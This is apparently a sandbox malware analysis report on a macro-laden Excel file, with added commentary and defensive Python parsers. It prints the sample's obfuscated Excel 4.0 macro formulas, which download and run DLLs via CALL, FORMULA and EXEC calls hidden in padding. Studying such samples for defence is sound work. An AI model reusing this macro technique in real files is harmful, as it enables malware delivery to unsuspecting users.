                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):125
                                                                                                                                                          Entropy (8bit):4.664326784625596
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:oyBVomMEcx14HdGUwSLMp6l7cA14HdGUwSLMp6lmMEcx14HdGUwSLMp6lv:dj6L4HdhNrP4HdhNbL4HdhNf
                                                                                                                                                          MD5:43AA6DB16A8F46F4ECBA390A0C27654B
                                                                                                                                                          SHA1:F81E4099E1ACBCB5C5C1FDEABD4EF079DBD32D32
                                                                                                                                                          SHA-256:41876EF74BEE90E671EC9ACD42CB627C0F108FCE02EEE7523A101F3410D1ABB1
                                                                                                                                                          SHA-512:1DBE7DAF0D2596E53585C49617EB89F46A4F135B81565FC52D51CF0F94D4C27B253A43966D6765A6412527A1DDF886C280A4C867316F53536E95D1DF9CA3FDF6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: Desktop.LNK=0..[xls]..9659e9a8_by_Libranalysis.LNK=0..9659e9a8_by_Libranalysis.LNK=0..[xls]..9659e9a8_by_Libranalysis.LNK=0..
                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22
                                                                                                                                                          Entropy (8bit):2.9808259362290785
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                          MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                          SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                          SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                          SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                          C:\Users\user\Desktop\02C40000
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):228873
                                                                                                                                                          Entropy (8bit):5.616544637493411
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:a7NiRdSD8YNoTU90uJfzn3b20X7vrPlsrXvLlL7LF7Niux:bRdTrTU9Z0qux
                                                                                                                                                          MD5:09AEDE7585D5AD0099BEB6C37CD691D3
                                                                                                                                                          SHA1:EAAB1B9AAA1E3704BB0CDC619BBD70F5DF20A0CB
                                                                                                                                                          SHA-256:D989BDABA142C45F0AE3CD17B74C1E3AC5476D5FF00E9687414FFA08A105D744
                                                                                                                                                          SHA-512:0C2A3363F0FC9CB81144ACAF80906FA617D5DEF59E794286E24828F05032429F4BACB2C4BB635179331F4F8B2024B04AC69CD2CDA3EC725445FE6466171C9A18
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: ........T8..........................\.p....pratesh B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1................E..C.a.l.i.b.r.i.1................E..A.r.i.a.l.1................E..A.r.i.a.l.1................E..A.r.i.a.l.1................E..C.a.l.i.b.r.i.1...,...8........E..A.r.i.a.l.1.......8........E..A.r.i.a.l.1.......8........E..A.r.i.a.l.1.......<........E..A.r.i.a.l.1.......4........E..A.r.i.a.l.1.......4........E..A.r.i.a.l.1...h...8........E..C.a.m.b.r.i.a.1................E..C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1.......>...........A.r.i.a.l.1.......?...........A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...............
                                                                                                                                                          C:\Users\user\ritofm.cvm
                                                                                                                                                          Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):395500
                                                                                                                                                          Entropy (8bit):0.00837191942417358
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:idqwHVg3F+X32RuZm6wY/Flmml/eVS3XJMgFKR+vlfq:eH1GSGUZmBYNcSWcnugFKR8l
                                                                                                                                                          MD5:B3D98EABC7EAB34E9E3EF6D7A9D24385
                                                                                                                                                          SHA1:B9711AA2FE0E5B7136BDF56C120A8D490569BE0D
                                                                                                                                                          SHA-256:B7C7FFE3ACD3A9FDBC2DF68B3B999E33D29A43B0235FBD68DB6BE8970008E872
                                                                                                                                                          SHA-512:5F6940C42F8D621D813A9C4D42A45DCB81AC1A113EB05B85DB80B0C47AC69727C44F8B9138A8D3C68308F2EC8571D829FFBC800DD4B3EF1686CECEDC85C72AEE
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..r..o!..o!..o!..|!..o!..}!..o!Rich..o!................PE..L....c.`...........!......... .......k......................................................................................0...........................................................................................0............................code............................... ..`.data............ ..................`...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
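The dropped file above is reported as a PE32 DLL although it is written under the name ritofm.cvm, and its 8-bit entropy of 0.008 means almost every one of its 395500 bytes is the same value (the preview shows only an MZ/PE header, a `code` and a `.data` section, and long runs of nothing). The following script, added here as an illustration and not part of the report or of Joe Sandbox, reproduces both checks on a constructed stand-in: it validates the MZ/PE header, reads the COFF machine word (the `L` after `PE..` in the preview is the low byte of 0x014C, i386) and the DLL flag, compares the magic with the file extension, and computes the same 8-bit Shannon entropy the report prints. The sample DLL blob, its size and the extension list are constructed for the example.

```python
import math
import os
import struct
from collections import Counter

# Extensions under which a PE image is expected; anything else is a mismatch.
EXECUTABLE_EXTS = {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl", ".drv"}
IMAGE_FILE_DLL = 0x2000           # Characteristics bit set on DLL images


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte, 0.0 .. 8.0, as the report prints it."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_info(data):
    """Return machine / DLL flag / section count if data has a valid MZ+PE header, else None."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes).
    machine, nsec, _ts, _sym, _nsym, _opt, chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    return {"machine": machine, "dll": bool(chars & IMAGE_FILE_DLL), "nsections": nsec}


def triage_drop(name, data):
    """Flag a dropped file whose content is a PE but whose extension says otherwise,
    and whether it is mostly padding (near-zero entropy)."""
    ext = os.path.splitext(name)[1].lower()
    pe = pe_info(data)
    ent = shannon_entropy(data)
    return {
        "name": name,
        "pe": pe,
        "entropy": round(ent, 3),
        "ext_mismatch": pe is not None and ext not in EXECUTABLE_EXTS,
        "mostly_padding": ent < 0.5,   # threshold chosen for this example
    }


def build_sample_dll(size=395500):
    """Constructed stand-in for ritofm.cvm (not the real dropped file): a bare
    MZ/PE header for an i386 DLL followed by zero padding, which gives the same
    near-zero entropy the report shows."""
    buf = bytearray(size)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)              # e_lfanew -> PE header
    buf[0x80:0x84] = b"PE\0\0"
    # machine=i386, 2 sections, SizeOfOptionalHeader=0xE0,
    # Characteristics = EXECUTABLE_IMAGE | 32BIT_MACHINE | DLL
    struct.pack_into("<HHIIIHH", buf, 0x84, 0x14C, 2, 0, 0, 0, 0xE0, 0x2102)
    return bytes(buf)


if __name__ == "__main__":
    for name in ("ritofm.cvm", "ritofm.dll"):
        print(triage_drop(name, build_sample_dll()))
```

Run on a real sandbox drop directory, the `ext_mismatch` flag is the programmatic form of the "non-matching file extension" finding, and `mostly_padding` singles out images that are padded to inflate their size or to defeat hash-based matching; a genuinely packed or encrypted payload would instead sit near 7.5 to 8 bits per byte.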

                                                                                                                                                          Static File Info

                                                                                                                                                          General

                                                                                                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: van-van, Last Saved By: vi-vi, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed May 12 08:24:11 2021, Security: 0
                                                                                                                                                          Entropy (8bit):3.258986427712615
                                                                                                                                                          TrID:
                                                                                                                                                          • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                          File name:9659e9a8_by_Libranalysis.xls
                                                                                                                                                          File size:375808
                                                                                                                                                          MD5:9659e9a80fba8f055fbe4e3757b0fd88
                                                                                                                                                          SHA1:701af32440a369d3bf1533cf3d741904b614a470
                                                                                                                                                          SHA256:252bda62a929c697a8b96035c1a52314d88067e745799cb66ac5d9dd593379b0
                                                                                                                                                          SHA512:2f94eeed0b1cbc7c7e13fbb66ffca3ba193118d5457b85ccfbf81f4f85406d91853383b34e0553a9f9130327d167f1fc5786d8d7935e6a67fa0c4e3a4fd37167
                                                                                                                                                          SSDEEP:3072:Q8UGHv2tt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/I/T/tbHm7H9G4l+s2k3zN4sbcd:vUGAt6Uqa5DPdG9uS9QLp4l+s+o8
                                                                                                                                                          File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                          File Icon

                                                                                                                                                          Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                          Static OLE Info

                                                                                                                                                          General

                                                                                                                                                          Document Type:OLE
                                                                                                                                                          Number of OLE Files:1

                                                                                                                                                          OLE File "9659e9a8_by_Libranalysis.xls"

                                                                                                                                                          Indicators

                                                                                                                                                          Has Summary Info:True
                                                                                                                                                          Application Name:Microsoft Excel
                                                                                                                                                          Encrypted Document:False
                                                                                                                                                          Contains Word Document Stream:False
                                                                                                                                                          Contains Workbook/Book Stream:True
                                                                                                                                                          Contains PowerPoint Document Stream:False
                                                                                                                                                          Contains Visio Document Stream:False
                                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                                          Flash Objects Count:
                                                                                                                                                          Contains VBA Macros:True

                                                                                                                                                          Summary

                                                                                                                                                          Code Page:1251
                                                                                                                                                          Author:van-van
                                                                                                                                                          Last Saved By:vi-vi
                                                                                                                                                          Create Time:2006-09-16 00:00:00
                                                                                                                                                          Last Saved Time:2021-05-12 07:24:11
                                                                                                                                                          Creating Application:Microsoft Excel
                                                                                                                                                          Security:0

                                                                                                                                                          Document Summary

                                                                                                                                                          Document Code Page:1251
                                                                                                                                                          Thumbnail Scaling Desired:False
                                                                                                                                                          Contains Dirty Links:False

                                                                                                                                                          Streams

                                                                                                                                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:4096
                                                                                                                                                          Entropy:0.287037498961
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                                                                                                                                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x5SummaryInformation
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:4096
                                                                                                                                                          Entropy:0.290777742057
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . v i - v i . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                                                                                                                          Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 363283
                                                                                                                                                          General
                                                                                                                                                          Stream Path:Book
                                                                                                                                                          File Type:Applesoft BASIC program data, first line number 8
                                                                                                                                                          Stream Size:363283
                                                                                                                                                          Entropy:3.24522262131
                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                          Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . v i - v i B . . . . . . . . . . . . . . . . . . . . . . . D o c 3 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .
                                                                                                                                                          Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 05 76 69 2d 76 69 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
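The `Book` stream above and the dropped `02C40000` file are both labelled "Applesoft BASIC program data, first line number N" because libmagic matches the 16-bit value at offset 2; on these files that value is the length of the BIFF BOF record (8 for the BIFF5 `Book` stream here, 16 for the BIFF8 workbook Excel wrote to the desktop). The Data Raw bytes printed above are in fact a BIFF record chain: BOF (type 0x0809, version 0x0500, dt 0x0005 workbook globals), INTERFACEHDR, MMS, TOOLBARHDR, TOOLBAREND, INTERFACEEND and the start of a WRITEACCESS record carrying the user name `vi-vi`, the same name as the Last Saved By field. The parser below is added as an illustration and is not part of the report or of Joe Sandbox; it walks that header and reports the BIFF flavour. The bytes are copied from the Data Raw field up to the user name; the space padding that completes the 112-byte WRITEACCESS record is constructed, since the preview is truncated.

```python
import struct

# Record bytes copied from the report's "Book" stream Data Raw field, followed
# by constructed padding: WRITEACCESS declares a length of 0x70 (112) bytes and
# the preview cuts off inside it, so the remaining spaces are filled in here.
BOOK_HEAD = bytes.fromhex(
    "09 08 08 00 00 05 05 00 17 37 cd 07"   # BOF, length 8 (BIFF5 layout)
    "e1 00 00 00"                           # INTERFACEHDR, length 0
    "c1 00 02 00 00 00"                     # MMS, length 2
    "bf 00 00 00"                           # TOOLBARHDR
    "c0 00 00 00"                           # TOOLBAREND
    "e2 00 00 00"                           # INTERFACEEND
    "5c 00 70 00"                           # WRITEACCESS, length 0x70
) + b"\x05vi-vi" + b" " * 106                # constructed padding to 112 bytes

BOF_TYPES = {0x0009: "BOF", 0x0209: "BOF", 0x0409: "BOF", 0x0809: "BOF"}
RECORD_NAMES = {
    **BOF_TYPES, 0x000A: "EOF", 0x005C: "WRITEACCESS", 0x0085: "BOUNDSHEET",
    0x00BF: "TOOLBARHDR", 0x00C0: "TOOLBAREND", 0x00C1: "MMS",
    0x00E1: "INTERFACEHDR", 0x00E2: "INTERFACEEND",
}
BOF_VERSIONS = {0x0500: "BIFF5 (Excel 5.0/95, 'Book' stream)",
                0x0600: "BIFF8 (Excel 97 and later, 'Workbook' stream)"}
BOF_DT = {0x0005: "workbook globals", 0x0006: "Visual Basic module",
          0x0010: "worksheet", 0x0020: "chart", 0x0040: "Excel 4.0 macro sheet",
          0x0100: "workspace"}


def walk_records(buf):
    """Yield BIFF records (type, name, length, data) until EOF or the buffer ends.
    A record whose declared length overruns the buffer is reported as truncated."""
    pos, out = 0, []
    while pos + 4 <= len(buf):
        rtype, rlen = struct.unpack_from("<HH", buf, pos)
        data = buf[pos + 4:pos + 4 + rlen]
        rec = {"type": rtype, "name": RECORD_NAMES.get(rtype, "0x%04X" % rtype),
               "len": rlen, "data": data, "truncated": len(data) < rlen}
        out.append(rec)
        if rec["truncated"] or rtype == 0x000A:
            break
        pos += 4 + rlen
    return out


def parse_bof(buf):
    """Decode the leading BOF record: version, substream type, build and year."""
    rtype, rlen = struct.unpack_from("<HH", buf, 0)
    if rtype not in BOF_TYPES:
        raise ValueError("stream does not start with a BIFF BOF record")
    if rtype != 0x0809 or rlen < 8:
        return {"type": rtype, "flavor": "BIFF2/3/4 (pre-Excel 5 layout)"}
    vers, dt, build, year = struct.unpack_from("<HHHH", buf, 4)
    return {"type": rtype, "vers": vers, "dt": dt, "rup_build": build,
            "rup_year": year,
            "flavor": BOF_VERSIONS.get(vers, "unknown BIFF version 0x%04X" % vers),
            "substream": BOF_DT.get(dt, "unknown dt 0x%04X" % dt)}


def write_access_user(data):
    """WRITEACCESS in BIFF5 is a byte-length-prefixed, space-padded user name."""
    n = data[0]
    return data[1:1 + n].decode("latin-1")


if __name__ == "__main__":
    print(parse_bof(BOOK_HEAD))
    for r in walk_records(BOOK_HEAD):
        print("%-14s len=%3d%s" % (r["name"], r["len"], " TRUNCATED" if r["truncated"] else ""))
    print("saved by:", write_access_user(walk_records(BOOK_HEAD)[-1]["data"]))
```

The practical point: a triage script that only opens a stream named `Workbook` never sees this document's macro sheets, because the file is saved in the Excel 5.0/95 layout and the stream is named `Book`. Checking the BOF version, and then looking for BOUNDSHEET records whose type marks an Excel 4.0 macro sheet, is the robust way to find XLM code regardless of which name the stream carries.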

                                                                                                                                                          Macro 4.0 Code

=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&"1",0,!AL21)=RUN(Doc4!AM6)

Reading the entry cell: CALL's first three arguments are the module, the procedure and the type string (Doc3!AU10, AU11 and AU12; the report does not print those cells), everything after them is passed to the procedure. Both calls hand over the same five-argument shape, 0, <cell>, <cell>, 0, <cell>, which is the parameter list of URLDownloadToFileA (caller, URL, file name, reserved, callback); on that reading Doc3!AU13 and AU14 hold the URLs and Doc3!BC17 and Doc3!BC18&"1" the two destination paths. RUN(Doc4!AM6) then hands control to a second macro sheet. The cell dump that follows is mostly padding, =RAND()=FACT(59)=SUMXMY2(452354,45245) repeated, with the working formulas buried in it: the FORMULA calls assemble strings from other cells and write them into AU13 and AU14 of before.3.5.0.sheet at run time, so the CALL arguments never exist as plain strings in the saved file (the third FORMULA wraps its cell references between the literals "U" and "A"). The EXEC cell at the end of the listing builds two command lines the same way; the only text the dump itself reveals is the separator "2 " before each path and the suffix "lRegi"&"ster"&"Ser"&"ver", which concatenates to "lRegisterServer". That is consistent with each downloaded file being launched through its DllRegisterServer export, but the host program name and the leading characters sit in Doc3!BB22, BB23, BB24, BB30 and BD31, which the report does not show, so the command line cannot be reconstructed from this listing alone.
                                                                                                                                                          
                                                                                                                                                          ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ39&BA39&before.3.5.0.sheet!BB39&before.3.5.0.sheet!BC39,before.3.5.0.sheet!AU13)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)
=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ40&BA40&before.3.5.0.sheet!BB40&before.3.5.0.sheet!BC40,before.3.5.0.sheet!AU14)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()
=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(""U""&before.3.5.0.sheet!BC25&before.3.5.0.sheet!BC29&before.3.5.0.sheet!BF28&before.3.5.0.sheet!BC28&before.3.5.0.sheet!BC31&before.3.5.0.sheet!BF29&""A"",before.3.5.0.she
                                                                                                                                                          "=MDETERM(56241452475)=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC17&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC18&""1""&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=RUN(Doc3!AY22)"
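The listing is hard to read because every cell runs its formulas together and hides the ones that matter inside padding. As an added example (not part of the Joe Sandbox report and not the malware's own code), the following Python separates the padding formulas (RAND, FACT, SUMXMY2 and MDETERM with numeric arguments only) from the ones that act (CALL, EXEC, FORMULA, RUN) and reduces each "&" concatenation to what the dump alone reveals: literal text is kept, every cell reference becomes a placeholder. The embedded EXEC line is the report's own text with the run of MDETERM padding shortened; the function names and the placeholder format are this example's choices.

```python
import re

# Sample input: the EXEC cell as the report prints it (CSV-quoted, so the embedded
# quotes are doubled), with the run of MDETERM padding cells shortened.
SAMPLE_EXEC_LINE = (
    '"=MDETERM(56241452475)'
    '=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC17&Doc3!BD31'
    '&""lRegi""&""ster""&""Ser""&""ver"")'
    '=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC18&""1""&Doc3!BD31'
    '&""lRegi""&""ster""&""Ser""&""ver"")'
    '=MDETERM(56241452475)=MDETERM(56241452475)=RUN(Doc3!AY22)"'
)

# Padding functions seen in this dump; anything else is kept for a human to read.
NOISE_FUNCS = {"RAND", "FACT", "SUMXMY2", "MDETERM"}


def unquote_csv(line):
    """Strip one layer of CSV quoting: the outer quotes and doubled inner quotes."""
    line = line.strip()
    if len(line) >= 2 and line[0] == line[-1] == '"':
        line = line[1:-1]
    return line.replace('""', '"')


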